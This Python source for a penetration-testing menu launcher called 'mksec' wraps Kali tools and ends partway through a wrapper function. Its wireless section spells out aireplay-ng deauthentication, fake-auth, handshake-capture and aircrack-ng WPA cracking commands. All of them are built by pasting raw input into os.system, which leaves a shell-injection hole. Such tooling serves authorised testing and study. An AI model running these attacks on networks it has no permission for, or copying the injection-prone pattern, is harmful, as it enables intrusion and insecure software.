words = ['\x1b[0m \x1b[3m\n"Failure is not the opposite of success; its part of success."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Every accomplishment starts with the decision to try."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"I have nothing to lose,but something to gain."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Just because i walk alone doesnt mean im lost."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Dont try to be different. Just be good. To be good is different enough."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Time never comes again."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"A smooth sea never made a skilled sailor."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Its always too early to quit."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Silence is the most powerful scream."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Everything has beauty, but not everyone sees it."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"The best way to predict your future is to create it."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Every accomplishment starts with the decision to try."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Its hard to beat a person who never gives up."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"They can kill the dreamer, but they can never kill the dream."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"I have nothing to lose,but something to gain."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"A person starts dying when they stop dreaming."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Great minds discuss ideas, average minds discuss events, small minds discuss people."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Life is like a coin: You can spend it any way you wish, but you only spend it once."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"You can cut all the flowers, but you cannot keep spring from coming."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"An intelligent hell would be better than a stupid paradise."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Being good is easy, what is difficult is being just."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Some people die at 25 and arent buried until 75."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Always tell the truth. 
That way, you dont have to remember what you said."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"The problem with the world is that the intelligent people are full of doubts, while the stupid ones are full of confidence."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"In order to succeed, you must first believe that you can."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"If you can dream it, you can do it."\x1b[0m\x1b[1m']
hint = ['\x1b[0m \x1b[3m\nType "help" to see all commands.\x1b[0m\x1b[1m ',"\x1b[0m \x1b[3m\nTo open a tool, you can type its name.\x1b[0m\x1b[1m","\x1b[0m \x1b[3m\nYou can open a tool by not only writing its number, but also its name. ex: ig == information gathering\x1b[0m\x1b[1m"]
def Tools(uinput):
    """Launch the tool whose name was typed at a prompt.

    Unknown names are silently ignored (the calling prompt decides what
    to do with them). Lookup happens by name at call time via globals(),
    so this works regardless of definition order in the module.
    """
    # NOTE(review): "mitmproxy" and "netsniff-ng" launched macchanger() in
    # the original as well -- preserved as-is; confirm whether intentional.
    launchers = {
        "dmitry": "dmitry",
        "ike-scan": "ikeScan",
        "netdiscover": "netdiscover",
        "nbtscan": "nbtscan",
        "nmap": "nmap",
        "theharvester": "theHarvester",
        "more": "informationGatheringMore",
        "nikto": "nikto",
        "unix-privesc-check": "unixPrivescCheck",
        "chkrootkit": "chkrootkit",
        "lynis": "lynis",
        "nessus": "nessus",
        "skipfish": "skipfish",
        "wpscan": "wpscan",
        "sqlmap": "sqlmap",
        "cewl": "cewl",
        "crunch": "crunch",
        "hashcat": "hashcat",
        "john": "john",
        "medusa": "medusa",
        "ncrack": "ncrack",
        "hash-identifier": "hashIdentifier",
        "hashid": "hashIdentifier",
        "wordlists": "wordlists",
        "wordlist": "wordlists",
        "payload creator and listener": "PayloadCreatorAndListener",
        "searchsploit": "searchsploit",
        "veil": "veil",
        "macchanger": "macchanger",
        "mitmproxy": "macchanger",
        "netsniff-ng": "macchanger",
        "responder": "responder",
        "arpspoof": "arpspoof",
        "exe2hex": "exe2hex",
        "weevely": "weevely",
        "binwalk": "binwalk",
        "bulk_extractor": "bulkExtractor",
        "foremost": "foremost",
        "hashdeep": "hashdeep",
        "cutycapt": "cutycapt",
        "pipal": "pipal",
    }
    # These entries clear the terminal before launching, as the original did.
    cleared_launchers = {
        "find": "find",
        "grep": "grep",
        "man": "man",
        "cli": "cli",
        "alc": "alc",
        "alllinuxcommands": "alc",
        "all linux commands": "alc",
    }
    if uinput in launchers:
        globals()[launchers[uinput]]()
    elif uinput in cleared_launchers:
        os.system("clear")
        globals()[cleared_launchers[uinput]]()
def RandomBannerSelector():
    """Print one random banner, one random quote, and one random hint."""
    for pool in (bannerList, words, hint):
        print(random.choice(pool))
def MainMenu():
    """Draw the banner plus the numbered main menu, then hand off to the prompt."""
    RandomBannerSelector()
    menu_text = "\x1b[1m\x1b[36m\n\x1b[7m\tMain Menu\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Information Gathering\n\x1b[37m02\x1b[36m Vulnerability Analysis\n\x1b[37m03\x1b[36m Web Application Analysis\n\x1b[37m04\x1b[36m Password Attacks\n\x1b[37m05\x1b[36m Wireless Attacks\n\x1b[37m06\x1b[36m Exploitation Tools\n\x1b[37m07\x1b[36m Sniffing & Spoofing\n\x1b[37m08\x1b[36m Post Exploitation\n\x1b[37m09\x1b[36m Forensics\n\x1b[37m10\x1b[36m Reporting Tools\n\x1b[37m11\x1b[36m Linux Commands\n\x1b[37m12\x1b[36m Mksec Tools\n\x1b[37m13\x1b[36m Show All Tools\n"
    print(menu_text)
    NoBanner()
def NoBanner():
    """Read one command at the bare prompt and dispatch it.

    Tool names are tried first via Tools(); menu keywords and numbered
    categories follow. Unknown input prints an error and re-prompts.
    """
    command = input("\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ").lower().strip()
    Tools(command)
    if command == "":
        NoBanner()
    elif command == "no banner":
        os.system("clear")
        NoBanner()
    elif command in ("banner", "menu"):
        os.system("clear")
        MainMenu()
    elif command in ("exit", "quit"):
        quit()
    elif command in ("help", "?"):
        os.system("clear")
        help()
    elif command == "about":
        os.system("clear")
        about()
    elif command == "clear":
        os.system("clear")
        NoBanner()
    elif command == "back":
        print("\x1b[1mUse the 'exit' command to quit.")
        NoBanner()
    elif command in ("1", "01", "information gathering"):
        os.system("clear")
        informationGathering()
    elif command in ("2", "02", "vulnerability analysis"):
        os.system("clear")
        vulnerabilityAnalysisTools()
    elif command in ("3", "03", "web application analysis"):
        os.system("clear")
        webApplicationAnalysis()
    elif command in ("4", "04", "password attacks"):
        os.system("clear")
        passwordAttacks()
    elif command in ("5", "05", "wireless attacks"):
        os.system("clear")
        wirelessAttacks()
    elif command in ("6", "06", "exploitation tools"):
        os.system("clear")
        exploitationTools()
    elif command in ("7", "07", "sniffing & spoofing"):
        os.system("clear")
        sniffingSpoofing()
    elif command in ("8", "08", "post exploitation"):
        os.system("clear")
        postExploitation()
    elif command in ("9", "09", "forensics"):
        os.system("clear")
        forensics()
    elif command in ("10", "reporting tools"):
        os.system("clear")
        reportingTools()
    elif command in ("11", "linux commands"):
        os.system("clear")
        linuxcommands()
    elif command in ("12", "mksec tools", "mksec"):
        os.system("clear")
        mksectools()
    elif command in ("13", "show all tools"):
        os.system("clear")
        showAllTools()
    else:
        print("\x1b[1m\x1b[31mcommand not found")
        NoBanner()
def UserInputs(uinput):
    """Handle the global navigation keywords shared by every tool prompt.

    ``uinput`` is the raw prompt text, usually suffixed by the caller with
    a context tag (e.g. "backinformation") so "back" can return to the
    right sub-menu. Matching is substring-based, as in the original.

    BUG FIX: "about" was checked twice (once calling about() directly and
    again later with a screen clear), so typing "about" invoked about()
    twice; a single clear-then-about handler remains.
    """
    low = uinput.lower()  # hoisted: the original re-lowered on every test
    if "back" in low:
        if low == "backinformation":
            os.system("clear")
            informationGathering()
        elif low == "backvuln":
            os.system("clear")
            vulnerabilityAnalysisTools()
        elif low == "backwebapp":
            os.system("clear")
            webApplicationAnalysis()
        elif low == "backpass":
            os.system("clear")
            passwordAttacks()
        elif low == "backexp":
            os.system("clear")
            exploitationTools()
        elif low == "backsniff":
            os.system("clear")
            sniffingSpoofing()
        elif low == "backpost":
            os.system("clear")
            postExploitation()
        elif low == "backfore":
            os.system("clear")
            forensics()
        elif low == "backrep":
            os.system("clear")
            reportingTools()
        elif low == "backlin":
            os.system("clear")
            linuxcommands()
        elif low == "backmainmenu":
            os.system("clear")
            MainMenu()
    if "clear" in low:
        os.system('printf "\033c"')
    if "about" in low:
        os.system("clear")
        about()
    if "exit" in low or "quit" in low:
        quit()
    if "help" in low or "?" in low:
        os.system("clear")
        help()
# categories
def mksectools():
    """Render the Mksec Tools sub-menu and dispatch the user's choice."""
    RandomBannerSelector()
    print("\x1b[1m\x1b[36m\n\x1b[7m\tMksec Tools\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Pythoncompiler")
    choice = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ").lower().strip()
    if choice in ("1", "pythoncompiler"):
        os.system("clear")
        pythonCompiler()
    elif choice in ("exit", "quit"):
        quit()
    elif choice in ("help", "-h", "--help", "?"):
        os.system("clear")
        help()
    elif choice == "about":
        os.system("clear")
        about()
    elif choice == "back":
        os.system("clear")
        MainMenu()
    else:
        # NOTE(review): empty input and unknown input both fell through to
        # informationGathering() in the original -- looks like a copy-paste
        # from another menu; behavior preserved as-is.
        os.system("clear")
        informationGathering()
def showAllTools():
    """List every available tool, then loop reading tool names to launch.

    BUG FIX: the listing contained ``Lynis\\x1b[36m Nessus`` -- a literal
    backslash and a missing newline -- so the escape sequence was printed
    as raw text and Nessus shared Lynis's line. Fixed to
    ``Lynis\n\x1b[36m Nessus``.
    """
    print("\x1b[1m\x1b[36m\n\x1b[7m\tAll Tools\n\x1b[0m\x1b[1m\n\x1b[36m Dmitry\n\x1b[36m Ike-scan\n\x1b[36m Netdiscover\n\x1b[36m Nbtscan\n\x1b[36m Nmap\n\x1b[36m Theharvester\n\x1b[36m More (Information Gathering)\n\x1b[36m Nikto\n\x1b[36m Unix-privesc-check\n\x1b[36m Chrootkit\n\x1b[36m Lynis\n\x1b[36m Nessus\n\x1b[36m Skipfish\n\x1b[36m Wpscan\n\x1b[36m Sqlmap\n\x1b[36m Cewl\n\x1b[36m Crunch\n\x1b[36m Hashcat\n\x1b[36m John\n\x1b[36m Medusa\n\x1b[36m Ncrack\n\x1b[36m Hash-identifier\n\x1b[36m Wordlists\n\x1b[36m ***wifi araclari eklenecek***\n\x1b[36m Payload Creator and Listener\n\x1b[36m Searchsploit\n\x1b[36m Veil\n\x1b[36m Macchanger\n\x1b[36m Mitmproxy\n\x1b[36m Netsniff-ng\n\x1b[36m Responder\n\x1b[36m Arpspoof\n\x1b[36m Exe2hex\n\x1b[36m Weevely\n\x1b[36m Binwalk\n\x1b[36m Bulk_Extractor\n\x1b[36m Foremost\n\x1b[36m Hashdeep\n\x1b[36m Cutycapt\n\x1b[36m Pipal\n\x1b[36m Find (Linux Commands)\n\x1b[36m Grep (Linux Commands)\n\x1b[36m Man (Linux Commands)\n\x1b[36m Cli (Linux Commands)\n\x1b[36m All Linux Commands\n")
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[all_tools]\033[37m\x1b[0m ")
        uinput = uinput.strip().lower()
        Tools(uinput)  # tool names are handled before menu keywords
        UserInputs(uinput + "mainmenu")
        if uinput == "":
            os.system("clear")
            showAllTools()
        elif uinput == "banner" or "menu" == uinput:
            os.system("clear")
            MainMenu()
def informationGathering():
    """Render the Information Gathering sub-menu and dispatch the choice."""
    RandomBannerSelector()
    print("\x1b[1m\x1b[36m\n\x1b[7m\tInformation Gathering\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Dmitry\n\x1b[37m02\x1b[36m Ike-scan\n\x1b[37m03\x1b[36m Netdiscover\n\x1b[37m04\x1b[36m Nbtscan\n\x1b[37m05\x1b[36m Nmap\n\x1b[37m06\x1b[36m Theharvester\n\x1b[37m07\x1b[36m More")
    choice = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ").strip().lower()
    UserInputs(choice + "mainmenu")
    if choice in ("1", "01", "dmitry"):
        dmitry()
    elif choice in ("2", "02", "ike-scan"):
        ikeScan()
    elif choice in ("3", "03", "netdiscover"):
        netdiscover()
    elif choice in ("4", "04", "nbtscan"):
        nbtscan()
    elif choice in ("5", "05", "nmap"):
        nmap()
    elif choice in ("6", "06", "theharvester"):
        theHarvester()
    elif choice in ("7", "07", "information gathering more"):
        informationGatheringMore()
    elif choice == "":
        os.system("clear")
        informationGathering()
def vulnerabilityAnalysisTools():
    """Render the Vulnerability Analysis sub-menu and dispatch the choice."""
    RandomBannerSelector()
    print("\x1b[1m\x1b[36m\n\x1b[7m\tVulnerability Analysis Tools\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Nikto\x1b[37m\n\x1b[37m02\x1b[36m Unix-privesc-check\n\x1b[37m03\x1b[36m Chrootkit\n\x1b[37m04\x1b[36m Lynis\n\x1b[37m05\x1b[36m Nessus")
    choice = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ").strip().lower()
    UserInputs(choice + "mainmenu")
    if choice in ("1", "01", "nikto"):
        nikto()
    elif choice in ("2", "02", "unix-privesc-check"):
        unixPrivescCheck()
    elif choice in ("3", "03", "chkrootkit"):
        chkrootkit()
    elif choice in ("4", "04", "lynis"):
        lynis()
    elif choice in ("5", "05", "nessus"):
        nessus()
    elif choice == "":
        os.system("clear")
        vulnerabilityAnalysisTools()
def webApplicationAnalysis():
    """Render the Web Application Analysis sub-menu and dispatch the choice."""
    RandomBannerSelector()
    print("\x1b[1m\x1b[36m\n\x1b[7m\tWeb Application Analysis\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Skipfish\n\x1b[37m02\x1b[36m Wpscan\n\x1b[37m03\x1b[36m Sqlmap")
    choice = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ").strip().lower()
    UserInputs(choice + "mainmenu")
    if choice in ("1", "01", "skipfish"):
        skipfish()
    elif choice in ("2", "02", "wpscan"):
        wpscan()
    elif choice in ("3", "03", "sqlmap"):
        sqlmap()
    elif choice == "":
        os.system("clear")
        webApplicationAnalysis()
def passwordAttacks():
    """Render the Password Attacks sub-menu and dispatch the choice."""
    RandomBannerSelector()
    print("\x1b[1m\x1b[36m\n\x1b[7m\tPassword Attacks\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Cewl\n\x1b[37m02\x1b[36m Crunch\n\x1b[37m03\x1b[36m Hashcat\n\x1b[37m04\x1b[36m John\n\x1b[37m05\x1b[36m Medusa\n\x1b[37m06\x1b[36m Ncrack\n\x1b[37m07\x1b[36m Hash-identifier\n\x1b[37m08\x1b[36m Wordlist")
    choice = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ").strip().lower()
    UserInputs(choice + "mainmenu")
    if choice in ("1", "01", "cewl"):
        cewl()
    elif choice in ("2", "02", "crunch"):
        crunch()
    elif choice in ("3", "03", "hashcat"):
        hashcat()
    elif choice in ("4", "04", "john"):
        john()
    elif choice in ("5", "05", "medusa"):
        medusa()
    elif choice in ("6", "06", "ncrack"):
        ncrack()
    elif choice in ("7", "07", "hashid", "hash-identifier"):
        hashIdentifier()
    elif choice in ("8", "08", "wordlists", "wordlist"):
        wordlists()
    elif choice == "":
        os.system("clear")
        passwordAttacks()
def wirelessAttacks():
    """Interactive Wireless Attacks menu (aircrack-ng suite front-end).

    Menu text and helper `echo` output are in Turkish. Every branch builds
    a shell command by string concatenation of raw user input and runs it
    through os.system.

    SECURITY NOTE(review): concatenating un-sanitized input into shell
    commands allows shell injection; acceptable only for a local,
    operator-driven tool -- consider subprocess.run([...]) instead.
    """
    RandomBannerSelector()
    # Menu (Turkish): 1-2 toggle monitor/managed mode, 3-4 airodump-ng scans,
    # 5 deauth attack, 6 WEP cracking, 7 fake auth, 8 packet replay,
    # 9 capture WPA handshake, 10 WPA cracking.
    os.system("""echo \x1b[1m\x1b[36m'
\x1b[7mWireless Attacks\x1b[0m\x1b[1m
\x1b[37m1\x1b[36m Monitor Mode
\x1b[37m2\x1b[36m Managed Mode
\x1b[37m3\x1b[36m Airodump-ng ile Butun Aglari Izle
\x1b[37m4\x1b[36m Airodump-ng ile Hedef Agi Detayli Incele
\x1b[37m5\x1b[36m Aireplay-ng ile Deauth (Agdan Dusurme) Saldirisi
\x1b[37m6\x1b[36m Aircrack-ng ile Wep Cracking
\x1b[37m7\x1b[36m Aireplay-ng ile Fake Auth
\x1b[37m8\x1b[36m Fake Auth Sonrasi Paket Yollamak
\x1b[37m9\x1b[36m Wpa Handshake Yakala
\x1b[37m10\x1b[36m Wpa Cracking'""")
    userInput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
    userInput = userInput.strip().lower()
    if userInput == "1":
        # Put the chosen interface into monitor mode: down -> set mode -> up.
        os.system("iwconfig")
        interface = input("\033[36m[mksec]\033[36m[interface]\033[0m ")
        os.system("ifconfig " + interface + " down")
        os.system("iwconfig " + interface + " mode monitor")
        os.system("ifconfig " + interface + " up")
        os.system("iwconfig")
        wirelessAttacks()
        # 1>> airmon-ng start wlan0 (monitor mode)
        # switches the card into monitor mode.
        # use ifconfig to verify.
        # 2>> airmon-ng stop wlan0mon
        # takes the card back out of monitor mode.
        # use ifconfig to verify.
    elif userInput == "2":
        # Restore the interface to managed (normal) mode.
        os.system("iwconfig")
        interface = input("\x1b[1m\033[36m[mksec]\033[36m[interface]\033[37m\x1b[0m ")
        os.system("ifconfig " + interface + " down")
        os.system("iwconfig " + interface + " mode managed")
        os.system("ifconfig " + interface + " up")
        os.system("iwconfig")
        wirelessAttacks()
    elif userInput == "3":
        # Watch all nearby networks with airodump-ng (requires monitor mode;
        # the echo string says so in Turkish).
        os.system("iwconfig")
        os.system("echo 'monitor mode kullandiginizdan emin olun'")
        interface = input("\x1b[1m\033[36m[mksec]\033[36m[interface]\033[37m\x1b[0m ")
        os.system("airodump-ng " + interface)
    elif userInput == "4":
        # Focused capture of one target network (channel + BSSID) written
        # to an output file prefix.
        os.system("echo 'monitor mode kullandiginizdan emin olun'")
        os.system("echo 'once butun aglari inceleyin ve daha sonra kendinize hedef ag belirleyin\nhedef agin channel, bssid bilgilerini almaniz yeterlidir'")
        ch = input("\x1b[1m\033[36m[mksec]\033[36m[channel]\033[37m\x1b[0m ")
        bssid = input("\x1b[1m\033[36m[mksec]\033[36m[bssid]\033[37m\x1b[0m ")
        os.system("echo '\033[33mex:/root/Desktop/mksec\033[32m' ")
        write = input("\x1b[1m\033[36m[mksec]\033[36m[output]\033[37m\x1b[0m ")
        interface = input("\x1b[1m\033[36m[mksec]\033[36m[interface]\033[37m\x1b[0m ")
        os.system("airodump-ng --channel " + ch + " --bssid " + bssid + " --write " + write + " " + interface)
    elif userInput == "5":
        # Deauthentication attack: knock a station off the target AP.
        os.system("echo 'monitor mode kullandiginizdan emin olun'")
        os.system("echo 'once hedef aga bagli cihazlarin station bilgisini almalisiniz. station: hedef cihazin mac adresidir\nayrica hedef modemin bssid si gereklidir'")
        os.system("echo '\033[33mattack type\nex:10 = kisa sureli, 10000 = uzun sureli\033[32m' ")
        deauth = input("\x1b[1m\033[36m[mksec]\033[36m[deauth.packages]\033[37m\x1b[0m ")
        router = input("\x1b[1m\033[36m[mksec]\033[36m[router.bssid]\033[37m\x1b[0m ")
        target = input("\x1b[1m\033[36m[mksec]\033[36m[target.station]\033[37m\x1b[0m ")
        interface = input("\x1b[1m\033[36m[mksec]\033[36m[interface]\033[37m\x1b[0m ")
        os.system("aireplay-ng --deauth " + deauth + " -a " + router + " -c " + target + " " + interface)
    elif userInput == "6":
        # WEP cracking from a previously captured .cap file.
        os.system("echo 'monitor mode kullandiginizdan emin olun'")
        os.system("echo '\033[33monce 4. islemi yeni terminalde acik birakin ardindan bunu yapin\033[32m' ")
        os.system("echo '\033[33mex:/root/Desktop/test-01.cap\033[32m' ")
        location = input("\x1b[1m\033[36m[mksec]\033[36m[cap.file.location]\033[37m\x1b[0m ")
        os.system("aircrack-ng " + location + "")
    elif userInput == "7":
        # Fake authentication against the target AP.
        os.system("echo 'monitor mode kullandiginizdan emin olun'")
        os.system("echo '\033[33monce 4. islemi yeni terminalde acik birakin ardindan bunu yapin\033[32m' ")
        router = input("\x1b[1m\033[36m[mksec]\033[36m[router.bssid]\033[37m\x1b[0m ")
        os.system("iwconfig")
        os.system("ip addr")
        wifimac = input("\x1b[1m\033[36m[mksec]\033[36m[your.wifi.mac.addr]\033[37m\x1b[0m ")
        interface = input("\x1b[1m\033[36m[mksec]\033[36m[interface]\033[37m\x1b[0m ")
        os.system("aireplay-ng --fakeauth 0 -a " + router + " -h " + wifimac + " " + interface)
    elif userInput == "8":
        # ARP replay after a successful fake auth.
        os.system("echo 'monitor mode kullandiginizdan emin olun'")
        os.system("echo '\033[33monce 4. islemi yeni terminalde acik birakin ardindan bunu yapin\033[32m' ")
        os.system("echo 'fake auth yaptiginiza emin olun'")
        router = input("\x1b[1m\033[36m[mksec]\033[36m[router.bssid]\033[37m\x1b[0m ")
        os.system("iwconfig")
        os.system("ip addr")
        wifimac = input("\x1b[1m\033[36m[mksec]\033[36m[your.wifi.mac.addr]\033[37m\x1b[0m ")
        interface = input("\x1b[1m\033[36m[mksec]\033[36m[interface]\033[37m\x1b[0m ")
        os.system("aireplay-ng --arpreplay -b " + router + " -h " + wifimac + " " + interface)
    elif userInput == "9":
        # Capture a WPA handshake by forcing reconnects (short deauth burst).
        os.system("echo 'monitor mode kullandiginizdan emin olun'")
        os.system("echo '\033[33monce 4. islemi yeni terminalde acik birakin ardindan bunu yapin. kisa sureli deauth yapin ve 4. islemin sag ust kosesinde wpa handshake yazdiginda ctrl+c ile durdurun\033[32m' ")
        os.system("echo '\033[33mattack type\nex:10 = kisa sureli, 10000 = uzun sureli\033[32m' ")
        deauth = input("\x1b[1m\033[36m[mksec]\033[36m[deauth.packages]\033[37m\x1b[0m ")
        router = input("\x1b[1m\033[36m[mksec]\033[36m[router.bssid]\033[37m\x1b[0m ")
        target = input("\x1b[1m\033[36m[mksec]\033[36m[target.station]\033[37m\x1b[0m ")
        interface = input("\x1b[1m\033[36m[mksec]\033[36m[interface]\033[37m\x1b[0m ")
        os.system("aireplay-ng --deauth " + deauth + " -a " + router + " -c " + target + " " + interface)
    elif userInput == "10":
        # Dictionary attack against the captured WPA handshake.
        os.system("echo 'monitor mode kullandiginizdan emin olun'")
        os.system("echo '\033[33monce 4. islemi yeni terminalde acik birakin ardindan bunu yapin\033[32m' ")
        os.system("echo '\033[33mex : /root/Desktop/handshake-file-01.cap\033[32m' ")
        handshake = input("\x1b[1m\033[36m[mksec]\033[36m[handshake.file]\033[37m\x1b[0m ")
        os.system("echo '\033[33mex : /root/Desktop/wordlist\033[32m' ")
        wordlist = input("\x1b[1m\033[36m[mksec]\033[36m[wordlist.file]\033[37m\x1b[0m ")
        os.system("aircrack-ng " + handshake + " -w " + wordlist)
    elif userInput == "":
        # Empty input: redraw this menu.
        os.system("clear")
        wirelessAttacks()
    elif userInput == "exit":
        quit()
    elif userInput == "quit":
        quit()
    elif userInput == "help":
        os.system("clear")
        help()
    elif userInput == "-h":
        os.system("clear")
        help()
    elif userInput == "--help":
        os.system("clear")
        help()
    elif userInput == "?":
        os.system("clear")
        help()
    elif userInput == "about":
        os.system("clear")
        about()
    elif userInput == "back":
        os.system("clear")
        MainMenu()
    else:
        # Unknown input: redraw this menu.
        os.system("clear")
        wirelessAttacks()
def exploitationTools():
    """Render the Exploitation Tools sub-menu and dispatch the choice."""
    RandomBannerSelector()
    print("\x1b[1m\x1b[36m\x1b[7m\n\tExploitation Tools\n\n\x1b[0m\x1b[1m\x1b[37m01\x1b[36m Payload Creator and Listener\n\x1b[37m02\x1b[36m Searchsploit\n\x1b[37m03\x1b[36m Veil")
    choice = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ").strip().lower()
    UserInputs(choice + "mainmenu")
    if choice in ("1", "01", "payload creator and listener"):
        PayloadCreatorAndListener()
    elif choice in ("2", "02", "searchsploit"):
        searchsploit()
    elif choice in ("3", "03", "veil"):
        veil()
    elif choice == "":
        os.system("clear")
        exploitationTools()
def sniffingSpoofing():
    """Render the Sniffing & Spoofing sub-menu and dispatch the choice."""
    RandomBannerSelector()
    print("\x1b[1m\x1b[36m\n\x1b[7m\tSniffing & Spoofing\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Macchanger\n\x1b[37m02\x1b[36m Mitmproxy\n\x1b[37m03\x1b[36m Netsniff-ng\n\x1b[37m04\x1b[36m Responder\n\x1b[37m05\x1b[36m Arpspoof")
    choice = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ").strip().lower()
    UserInputs(choice + "mainmenu")
    if choice in ("1", "01", "macchanger"):
        macchanger()
    elif choice in ("2", "02", "mitmproxy"):
        # NOTE(review): options 2 and 3 launched macchanger() in the
        # original too -- preserved as-is; confirm whether intentional.
        macchanger()
    elif choice in ("3", "03", "netsniff-ng"):
        macchanger()
    elif choice in ("4", "04", "responder"):
        responder()
    elif choice in ("5", "05", "arpspoof"):
        arpspoof()
    elif choice == "":
        os.system("clear")
        sniffingSpoofing()
def postExploitation():
    """Render the Post Exploitation sub-menu and dispatch the choice."""
    RandomBannerSelector()
    print("\x1b[1m\x1b[36m\n\x1b[7m\tPost Exploitation\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Exe2hex\n\x1b[37m02\x1b[36m Weevely\n\x1b[37m03\x1b[36m Veil")
    choice = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ").strip().lower()
    UserInputs(choice + "mainmenu")
    if choice in ("1", "01", "exe2hex"):
        exe2hex()
    elif choice in ("2", "02", "weevely"):
        weevely()
    elif choice in ("3", "03", "veil"):
        veil()
    elif choice == "":
        os.system("clear")
        postExploitation()
def forensics():
    """Render the Forensics sub-menu and dispatch the choice."""
    RandomBannerSelector()
    print("\x1b[1m\x1b[36m\n\x1b[7m\tForensics\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Binwalk\n\x1b[37m02\x1b[36m Bulk_extractor\n\x1b[37m03\x1b[36m Foremost\n\x1b[37m04\x1b[36m Hashdeep")
    choice = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ").strip().lower()
    UserInputs(choice + "mainmenu")
    if choice in ("1", "01", "binwalk"):
        binwalk()
    elif choice in ("2", "02", "bulk_extractor"):
        bulkExtractor()
    elif choice in ("3", "03", "foremost"):
        foremost()
    elif choice in ("4", "04", "hashdeep"):
        hashdeep()
    elif choice == "":
        os.system("clear")
        forensics()
def reportingTools():
    """Render the Reporting Tools sub-menu and dispatch the choice."""
    RandomBannerSelector()
    print("\x1b[1m\x1b[36m\n\x1b[7m\tReporting Tools\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Cutycapt\n\x1b[37m02\x1b[36m Pipal")
    choice = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ").strip().lower()
    UserInputs(choice + "mainmenu")
    if choice in ("1", "01", "cutycapt"):
        cutycapt()
    elif choice in ("2", "02", "pipal"):
        pipal()
    elif choice == "":
        os.system("clear")
        reportingTools()
def linuxcommands():
    """Render the Linux Commands sub-menu and dispatch the choice."""
    RandomBannerSelector()
    print("\x1b[1m\x1b[36m\n\x1b[7m\tLinux Commands\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Find\n\x1b[37m02\x1b[36m Grep\n\x1b[37m03\x1b[36m Man\n\x1b[37m04\x1b[36m Cli\n\x1b[37m05\x1b[36m All Linux Commands")
    choice = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ").strip().lower()
    UserInputs(choice + "mainmenu")
    if choice in ("1", "01", "find"):
        os.system("clear")
        find()
    elif choice in ("2", "02", "grep"):
        os.system("clear")
        grep()
    elif choice in ("3", "03", "man"):
        os.system("clear")
        man()
    elif choice in ("4", "04", "cli"):
        os.system("clear")
        cli()
    elif choice in ("5", "05", "alc"):
        os.system("clear")
        alc()
    elif choice == "":
        os.system("clear")
        linuxcommands()
# tools
def dmitry():
    """Interactive wrapper around the dmitry information-gathering tool.

    Loops forever reading msfconsole-style commands: info / options /
    set url / set output / run. Global keywords are delegated to
    UserInputs() with the "information" back-tag.
    """
    url = " "
    output = " "
    while True:
        raw = input("\x1b[1m\033[36m[mksec]\033[36m[dmitry]\033[37m\x1b[0m ")
        UserInputs(raw + "information")
        low = raw.lower()
        if low == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mCollects information from the target site.\n\x1b[33mTR:\x1b[37mHedef siteden bilgi toplar.")
        elif low == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nURL {} YES Target site \x1b[32mex: test.com\x1b[37m\nOUTPUT{} YES Where you want to save? \x1b[32mex: /root/Desktop/test\x1b[37m".format(url, output))
        elif "set url" in low:
            url = raw
            for prefix in ("set url ", "set URL ", "SET url ", "SET URL "):
                url = url.replace(prefix, "")
            url = url.center(25)
        elif "set output" in low:
            output = raw
            for prefix in ("set output ", "set OUTPUT ", "SET output ", "SET OUTPUT "):
                output = output.replace(prefix, "")
            output = output.center(25)
